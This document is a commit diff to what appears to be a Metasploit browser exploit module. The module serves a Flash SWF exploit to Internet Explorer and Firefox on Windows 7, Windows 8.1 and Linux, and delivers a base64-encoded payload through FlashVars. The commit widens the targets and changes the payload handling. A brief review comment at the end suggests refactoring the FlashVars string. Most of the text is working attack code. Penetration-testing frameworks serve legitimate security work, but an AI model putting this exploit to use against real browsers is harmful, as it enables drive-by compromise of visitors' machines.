Add more targets
parent
4ee0a1438c
commit
ab68d8429b
Binary file not shown.
@ -8,7 +8,6 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
@ -40,20 +39,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['win', 'unix'],
|
||||
'Arch' => [ARCH_X86, ARCH_CMD],
|
||||
'Platform' => ['win', 'linux'],
|
||||
'Arch' => [ARCH_X86],
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:arch => ARCH_X86,
|
||||
:os_name => lambda do |os|
|
||||
os =~ OperatingSystems::Match::LINUX ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_7
|
||||
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_81
|
||||
end,
|
||||
:ua_name => lambda do |ua|
|
||||
case target.name
|
||||
when 'Windows'
|
||||
return true if ua == Msf::HttpClients::IE
|
||||
return true if [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua)
|
||||
when 'Linux'
|
||||
return true if ua == Msf::HttpClients::FF
|
||||
end
|
||||
@ -75,14 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
[
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
[ 'Linux',
|
||||
{
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD
|
||||
'Platform' => 'linux'
|
||||
}
|
||||
]
|
||||
],
|
||||
@ -112,15 +110,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
os_name = target_info[:os_name]
|
||||
|
||||
if target.name =~ /Windows/
|
||||
target_payload = get_payload(cli, target_info)
|
||||
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
|
||||
b64_payload = Rex::Text.encode_base64(psh_payload)
|
||||
platform_id = 'win'
|
||||
elsif target.name =~ /Linux/
|
||||
target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
platform_id = 'linux'
|
||||
end
|
||||
|
||||
@ -129,9 +125,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
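Review bot: The FlashVars string is spelled out twice in the HTML template, once on the `<param name="FlashVars">` line and once on the `<embed>` line, and this commit had to append `&os=<%=os_name%>` to both by hand. Building it once in `exploit_template`, e.g. `flash_vars = "sh=#{b64_payload}&pl=#{platform_id}&os=#{os_name}"`, and emitting `<%=flash_vars%>` in both places would keep the two copies from drifting; this assumes the template is rendered with the method's local binding, as the existing `<%=b64_payload%>` references suggest. A short comment above that assignment naming the three keys (`sh`, `pl`, `os`) and noting that `os` is the detected `target_info[:os_name]` would document the contract with the SWF, which this page shows only as "Binary file not shown" and which therefore cannot be checked against the template here. `exploit_template` begins in the previous hunk and its end lies outside the visible lines.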